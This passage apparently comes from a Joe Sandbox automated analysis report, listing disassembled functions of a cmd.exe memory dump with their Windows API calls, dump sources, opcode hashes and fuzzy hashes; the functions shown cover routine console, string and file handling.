                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D7874B
                                                                                          • Part of subcall function 00D69B3B: _get_osfhandle.MSVCRT ref: 00D69B4E
                                                                                          • Part of subcall function 00D69B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,000000FF,00D9A7F0,00002000,00000000,00000000), ref: 00D69B8E
                                                                                          • Part of subcall function 00D69B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,-00000001,?,00000000), ref: 00D69BA3
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001), ref: 00D787CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 1333215474-0
                                                                                        • Opcode ID: 9564a9b0671d5fe2b9348fed6ca25bd9b84bab8c232b806945e65030f68a25dc
                                                                                        • Instruction ID: f6d9f2baee798644f1e28deb57715d7ea5cb17d62f1a9ca4e701f950f0a6a714
                                                                                        • Opcode Fuzzy Hash: 9564a9b0671d5fe2b9348fed6ca25bd9b84bab8c232b806945e65030f68a25dc
                                                                                        • Instruction Fuzzy Hash: 0451D831B80301EBDB28ABB8D889B6EB7A9EB04715F148529F546D7281FB70DC40DB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D66150 Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • iswspace.MSVCRT ref: 00D661E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace
                                                                                        • String ID:
                                                                                        • API String ID: 3458554142-0
                                                                                        • Opcode ID: 3b922fcdb3af56f9d79dd0f30c2dd8b9588f55b168ffab20e2e38775b50eea8e
                                                                                        • Instruction ID: 5daeee763246b148f4e0e5e2d2a6b2d8851c3f1a517a3c9e63e8bd3778644c2f
                                                                                        • Opcode Fuzzy Hash: 3b922fcdb3af56f9d79dd0f30c2dd8b9588f55b168ffab20e2e38775b50eea8e
                                                                                        • Instruction Fuzzy Hash: CA91A8719003549BDB24DFA9EC21AAEB7B8FF49300F14861EE80AD7390EB719840CB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6A6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: ELSE$IF/?
                                                                                        • API String ID: 2081463915-1134991328
                                                                                        • Opcode ID: 976125d00520c5236d27f256aef102236207cc3a3a2b944fa51b724b8f495977
                                                                                        • Instruction ID: 181d14094aee417cfab815c36b4b3dc1252682ce46da1cf75a329866d4371065
                                                                                        • Opcode Fuzzy Hash: 976125d00520c5236d27f256aef102236207cc3a3a2b944fa51b724b8f495977
                                                                                        • Instruction Fuzzy Hash: F95126326143019FE730AB79AC56B2637A0DB85311F19942FE58ADB291FBB1C845CF32
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D762C0 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D7643A: NtOpenThreadToken.NTDLL ref: 00D76454
                                                                                          • Part of subcall function 00D7643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00D7646C
                                                                                          • Part of subcall function 00D7643A: NtClose.NTDLL ref: 00D764BD
                                                                                        • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 00D763B5
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00D763E3
                                                                                        • RtlNtStatusToDosError.NTDLL ref: 00D81EF4
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D81EFB
                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00D81F6B
                                                                                        • wcsstr.MSVCRT ref: 00D81F86
                                                                                        • wcsstr.MSVCRT ref: 00D81FA4
                                                                                          • Part of subcall function 00D7640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00D89C96,00D7FDFA,00000000,?), ref: 00D7642F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                        • String ID:
                                                                                        • API String ID: 1313749407-0
                                                                                        • Opcode ID: 3fbdafa0dbe6fc3df8e493fdcfedad6bdb1c58ef36de90ad23ad2b1e390f98a3
                                                                                        • Instruction ID: 437a54ad38d219919900d92a0f4bf192f19d2b372afd02c8ff76e43c5852c618
                                                                                        • Opcode Fuzzy Hash: 3fbdafa0dbe6fc3df8e493fdcfedad6bdb1c58ef36de90ad23ad2b1e390f98a3
                                                                                        • Instruction Fuzzy Hash: C151D735A006299BCF24AF699C847AE73A5EF54314F1981A9E909D7240FB70DD45CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D89A7D Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D89AC2
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00D89B22
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00D89B32
                                                                                        • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00D89BAD
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00D89BB8
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00D89BCB
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D89BF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$CurrentDirectoryModememset$Last
                                                                                        • String ID:
                                                                                        • API String ID: 1725644760-0
                                                                                        • Opcode ID: adf5bba65fc031d89bcfd04faf6c9e9ee52add70f528b8674f984a1c3943276b
                                                                                        • Instruction ID: 31c861b32d2c1a052fafff781f13cb21605ef7f2fe2797fc5330ba6137c1b476
                                                                                        • Opcode Fuzzy Hash: adf5bba65fc031d89bcfd04faf6c9e9ee52add70f528b8674f984a1c3943276b
                                                                                        • Instruction Fuzzy Hash: 68417D31A01318ABDF14DBA4EC95AEEB7B4EF59714F088199E805E7250EB34EA40CB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8B701 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 00D8B717
                                                                                        • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00D8B72A
                                                                                        • RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 00D8B7FC
                                                                                          • Part of subcall function 00D68235: _get_osfhandle.MSVCRT ref: 00D6824E
                                                                                          • Part of subcall function 00D68235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68256
                                                                                          • Part of subcall function 00D68235: _get_osfhandle.MSVCRT ref: 00D68264
                                                                                          • Part of subcall function 00D68235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6826C
                                                                                        • memset.MSVCRT ref: 00D8B76D
                                                                                        • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 00D8B788
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                                        • String ID: <
                                                                                        • API String ID: 1664749912-4251816714
                                                                                        • Opcode ID: 5d7f29a4b93bcd4dfa380c397bbc823b8dc0a04b85e284645827df15c71e6f95
                                                                                        • Instruction ID: c5aca463dd7f7a9abd5591357db32d5fa759b1b0bed6c3c734c68bfaeb195e39
                                                                                        • Opcode Fuzzy Hash: 5d7f29a4b93bcd4dfa380c397bbc823b8dc0a04b85e284645827df15c71e6f95
                                                                                        • Instruction Fuzzy Hash: AC310A75D00309AFDB11EFA9D885ADEBBB8EF48354F144116E905E7350E7309A45CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D681EC Relevance: 10.5, APIs: 7, Instructions: 41synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D68203
                                                                                        • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D6820E
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D68229
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0AB
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0C1
                                                                                        • fprintf.MSVCRT ref: 00D7B0D5
                                                                                        • fflush.MSVCRT ref: 00D7B0E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4271573189-0
                                                                                        • Opcode ID: bbf95e3d898442d14b77d87dc58acc2e9cd42b6be42477d321b9ab5b2e6a0986
                                                                                        • Instruction ID: a1e72b3563f7ed78a25909ec0cce25b9b5898f1ea9774fc95c5d4835ff87e9f2
                                                                                        • Opcode Fuzzy Hash: bbf95e3d898442d14b77d87dc58acc2e9cd42b6be42477d321b9ab5b2e6a0986
                                                                                        • Instruction Fuzzy Hash: A5014F31105310FFDB016BA8ED0EBAA7B68EB0A325F104745F125D23E2DBB54A45DB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D73CD0 Relevance: 9.4, APIs: 6, Instructions: 438COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D73D30
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00D73E3D
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D73E88
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$FullNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 3158150540-0
                                                                                        • Opcode ID: 0f3464f32233361b679bef313a586dc279af2139073e34ab24ff3f0984230009
                                                                                        • Instruction ID: 9c392d0e99858d14060759cf20049ec0351c29af786e22dc0b5fde562ae42fe5
                                                                                        • Opcode Fuzzy Hash: 0f3464f32233361b679bef313a586dc279af2139073e34ab24ff3f0984230009
                                                                                        • Instruction Fuzzy Hash: C1029235A011159BCB35DF68DC957B9B3B1FF48310F1882A9E84E97250E734AE82DF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6AD60 Relevance: 9.3, APIs: 6, Instructions: 328COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,335C4BB4,00000001,?), ref: 00D6ADB6
                                                                                          • Part of subcall function 00D75A2E: memset.MSVCRT ref: 00D75A5A
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • towupper.MSVCRT ref: 00D6B0E3
                                                                                          • Part of subcall function 00D6E950: memset.MSVCRT ref: 00D6E9A0
                                                                                          • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6E9FC
                                                                                          • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6EA14
                                                                                          • Part of subcall function 00D6E950: _wcsicmp.MSVCRT ref: 00D6EA80
                                                                                        • wcschr.MSVCRT ref: 00D6AED2
                                                                                        • wcsncmp.MSVCRT(00000000,00D622A8,00000004,00000002,00007FE7), ref: 00D6B016
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 00D7CC6C
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D7CCCB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                                        • String ID:
                                                                                        • API String ID: 4198873954-0
                                                                                        • Opcode ID: 5a786e36165d6c1b903080b908a95c98697689017cf3f7b7b96fdbeab3053f74
                                                                                        • Instruction ID: 73811a37b7a986b526409c7971ec0013ad377ca31db0af9405d9ab60d6cb33cb
                                                                                        • Opcode Fuzzy Hash: 5a786e36165d6c1b903080b908a95c98697689017cf3f7b7b96fdbeab3053f74
                                                                                        • Instruction Fuzzy Hash: F1B12871A002158BCB24AF2CC89577A7364EF41310F188169E98EE7291FB70DD85CBB7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6498F Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D7858D
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D78595
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00D785D4
                                                                                        • _get_osfhandle.MSVCRT ref: 00D785ED
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D785F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                        • String ID:
                                                                                        • API String ID: 1066134489-0
                                                                                        • Opcode ID: f76382055faf7407b95527e2c4b6ee92d98f15700b83f20d8a8eb8f639af2a3f
                                                                                        • Instruction ID: 00830ead27a367ef1ca39a81d31f4cbfb6d3bbf42e976ab50d30f27d3abc06fa
                                                                                        • Opcode Fuzzy Hash: f76382055faf7407b95527e2c4b6ee92d98f15700b83f20d8a8eb8f639af2a3f
                                                                                        • Instruction Fuzzy Hash: E341B631A40311ABCF249F78D88DA6EB7A5EB40304F18856AE84ADB285FE70DD40DA71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6B7A8 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _tell.MSVCRT ref: 00D6B7F9
                                                                                        • _close.MSVCRT ref: 00D6B82C
                                                                                        • memset.MSVCRT ref: 00D6B8CC
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00D6B936
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D6B947
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6B96D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1380661413-0
                                                                                        • Opcode ID: 6b1913007286cd989b905ffee2a03be5422b4da0895ce8f7b420a63ed1256c06
                                                                                        • Instruction ID: f0a35452641e3109986fa22d27bf990837f4ee08a84f389cf2c3b12964ec80f4
                                                                                        • Opcode Fuzzy Hash: 6b1913007286cd989b905ffee2a03be5422b4da0895ce8f7b420a63ed1256c06
                                                                                        • Instruction Fuzzy Hash: D441B0709043009BDB309F68D84832AB7E6EB85324F18592EE899D73A0E774DC85CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D76903 Relevance: 9.1, APIs: 6, Instructions: 105sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilterSleepXcpt_amsg_exit_inittermexit
                                                                                        • String ID:
                                                                                        • API String ID: 2369047465-0
                                                                                        • Opcode ID: 4d721b8f6c3055026e2a72e0a45e88ba9a276a6caacec5bae595169215ce5ac8
                                                                                        • Instruction ID: fdfc1f74ca722ecb9ece0d4622759cd51d0404d56604c22f610a378d63db665c
                                                                                        • Opcode Fuzzy Hash: 4d721b8f6c3055026e2a72e0a45e88ba9a276a6caacec5bae595169215ce5ac8
                                                                                        • Instruction Fuzzy Hash: AA31F075A44711DFEB21AF64EC4A7297BA0EB48B24F248529E609D73A0FB30D840CF70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D67F47 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D67F7C
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00D67FC0
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D67FF3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6800C
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7B05A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$DriveInformationTypeVolume
                                                                                        • String ID:
                                                                                        • API String ID: 285405857-0
                                                                                        • Opcode ID: 167a446262bb265d3f96e8c070b49af1601c14f94333851de31c51e064775eb4
                                                                                        • Instruction ID: 0792c76714d8b9677201b876b63bdb9688990d411450719d93662dba92aa5676
                                                                                        • Opcode Fuzzy Hash: 167a446262bb265d3f96e8c070b49af1601c14f94333851de31c51e064775eb4
                                                                                        • Instruction Fuzzy Hash: 43318171A10209ABDF24CBA9DC85AEFB7B8FF09354F04495AE405E2250EB34DD44CB31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6998D Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D69A11: _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                          • Part of subcall function 00D69A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                          • Part of subcall function 00D69A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                          • Part of subcall function 00D69A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                          • Part of subcall function 00D69A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
                                                                                          • Part of subcall function 00D69A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
